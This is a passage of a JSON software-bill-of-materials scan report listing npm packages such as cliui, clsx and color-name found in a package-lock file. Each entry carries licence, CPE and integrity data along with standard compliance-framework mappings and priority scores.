"16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c077917c166ed35e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cliui 6.0.0", "title": "cliui 6.0.0", "description": "Package discovered: cliui 6.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0b1fbe7259e117a1", "name": "cliui", "version": "6.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cliui@6.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz", "integrity": "sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==", "dependencies": { "string-width": "^4.2.0", "strip-ansi": "^6.0.0", "wrap-ansi": "^6.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b756cde7127582a3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cliui 8.0.1", "title": "cliui 8.0.1", "description": "Package discovered: cliui 8.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6699f516cd09331f", "name": "cliui", "version": "8.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cliui@8.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", "dependencies": { "string-width": "^4.2.0", "strip-ansi": "^6.0.1", "wrap-ansi": "^7.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6102e65c9c7e3be7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: clone 2.1.2", "title": "clone 2.1.2", "description": "Package discovered: clone 2.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "924490c8cb0d8bef", "name": "clone", "version": "2.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/clone@2.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/clone/-/clone-2.1.2.tgz", "integrity": "sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "de7fc275efead359", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: clsx 2.1.1", "title": "clsx 2.1.1", "description": "Package discovered: clsx 2.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1cdd74d474651cd1", "name": "clsx", "version": "2.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/clsx@2.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz", "integrity": "sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "03115b0621f3a47e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cluster-key-slot 1.1.2", "title": "cluster-key-slot 1.1.2", "description": "Package discovered: cluster-key-slot 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "635dabdd9cdc8fd8", "name": "cluster-key-slot", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cluster-key-slot@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz", "integrity": "sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "56e4289efb51aa13", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: color-convert 2.0.1", "title": "color-convert 2.0.1", "description": "Package discovered: color-convert 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fcc3d45495abf3bd", "name": "color-convert", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/color-convert@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dependencies": { "color-name": "~1.1.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "568b6e4207edec50", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: color-name 1.1.4", "title": "color-name 1.1.4", "description": "Package discovered: color-name 1.1.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9d8d6c4ccfd91cbf", "name": "color-name", "version": "1.1.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/color-name@1.1.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c5d023023358f691", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: color-name 2.1.0", "title": "color-name 2.1.0", "description": "Package discovered: color-name 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8dfa4f08fc1899a7", "name": "color-name", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/color-name@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz", "integrity": "sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d0d3f9cc2cfd641a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: color-string 1.9.1", "title": "color-string 1.9.1", "description": "Package discovered: color-string 1.9.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b96884f4eed4192d", "name": "color-string", "version": "1.9.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/color-string@1.9.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz", "integrity": "sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg==", "dependencies": { "color-name": "^1.0.0", "simple-swizzle": "^0.2.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b8edaba313b178d2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: color-string 2.1.4", "title": "color-string 2.1.4", "description": "Package discovered: color-string 2.1.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1f15e4f4433605fc", "name": "color-string", "version": 